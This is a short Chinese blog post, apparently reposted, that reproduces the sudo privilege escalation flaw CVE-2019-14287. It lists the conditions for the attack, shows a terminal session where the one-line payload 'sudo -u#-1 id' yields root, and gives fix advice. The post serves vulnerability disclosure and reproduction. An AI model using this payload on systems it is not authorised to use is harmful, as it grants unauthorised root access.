[漏洞复现]CVE-2019-14287 sudo提权漏洞

时间：2019-10-15 18:20:46 阅读：99 评论：0 收藏：0 [点我收藏+]

漏洞描述

2019年10月14日，CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload，用户可提升至root权限。
利用前提

sudo -v < 1.8.28
知道当前用户的密码
当前用户存在于sudo权限列表

漏洞复现

mark@mark-Pc:~$ id
uid=1000(mark) gid=1000(mark) 组=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
mark@mark-Pc:~$ sudo -u#-1 id
[sudo] mark 的密码： 
uid=0(root) gid=1000(mark) 组=1000(mark)

修复建议

升级sudo到1.8.28版本
做好sudo用户列表管理

[漏洞复现]CVE-2019-14287 sudo提权漏洞

原文：https://www.cnblogs.com/mark-zh/p/11679015.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)